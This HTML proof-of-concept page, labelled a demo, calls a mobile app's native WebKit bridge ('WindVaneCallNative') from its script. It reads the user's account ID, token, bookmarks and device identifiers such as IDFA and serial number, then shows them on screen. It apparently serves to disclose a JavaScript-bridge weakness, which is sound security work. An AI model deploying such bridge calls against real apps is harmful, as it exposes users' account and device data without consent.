<!DOCTYPE html>
<html>

<head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0" charset="UTF-8">
    <style>
        body {
            margin: 0;
            font-family: Arial, Helvetica, sans-serif;
        }

        .container {
            width: 100%;
            padding: 15px;
        }

        @media screen and (min-width: 700px) {
            .container {
                width: 70%;
                margin: auto;
            }
        }

        p {
            white-space: pre-wrap; 
            word-wrap: break-word; 
            overflow-wrap: break-word; 
        }

        .bold-and-larger {
            font-weight: bold; 
            font-size: 1.5em; 
        }

        .larger {
            font-weight: bold; 
            font-size: 1.2em; 
        }

    </style>
    <title>Malicious Page</title>

</head>


<body>
    <h1>Malicious Page</h1>

    <p>!!! This is just a demo page, NO Sensitive Data will be stored!!!</p>

    <p><span class="bold-and-larger">An attacker can:</span></p>

    <p><span class="larger">Get Your Account Info:</span></p>
    <p style="font-size: 15px;" id="UserID"></p>
    <p style="font-size: 15px;" id="UmidToken"></p>
    <p style="font-size: 15px;" id="BookMarkList"></p>

    <p><span class="larger">Get Your Device Info:</span></p>
    <p style="font-size: 15px;" id="IDFA"></p>
    <p style="font-size: 15px;" id="SQDeviceID"></p>
    <p style="font-size: 15px;" id="SN"></p>
    <p style="font-size: 15px;" id="UTDID"></p>
    <p style="font-size: 15px;" id="AAID"></p>

    <br>
    <script>
        window.WindVane = {};
        window.WindVane.onSuccess = function(callbackID, retVal, boolVal){
            var json = retVal;
            switch(callbackID){
                case "1":
                    document.getElementById("BookMarkList").innerText = "Your BookMark List: \n" + JSON.stringify(json.value.data.bookIdList);
                    break;

                case "2":
                    document.getElementById("UmidToken").innerText = "Your UmidToken: " + json.value.data.umidtoken;
                    document.getElementById("IDFA").innerText = "Your IDFA: \n" + json.value.data.idfa;
                    document.getElementById("UserID").innerText = "Your UserID: " + json.value.data.userId;
                    document.getElementById("SN").innerText = "Your SN: \n" + json.value.data.sn;
                    document.getElementById("UTDID").innerText = "Your UTDID: \n" + json.value.data.utdid;
                    document.getElementById("SQDeviceID").innerText = "Your SQDeviceID: \n" + json.value.data.sqiOSUniqDeviceId;
                    document.getElementById("AAID").innerText = "Your AAID: \n" + json.value.data.aaid;
                    break;                    
            }
        }

        window.webkit.messageHandlers.WindVaneCallNative.postMessage({
            name : "SQRJSBookMark.getAppBookMarks",
            params : '{}',
            reqId : "1"
        });

        window.webkit.messageHandlers.WindVaneCallNative.postMessage({
            name : "SQRJSEnv.getAppInfo",
            params : '{}',
            reqId : "2"
        });

    </script>

</body>

</html>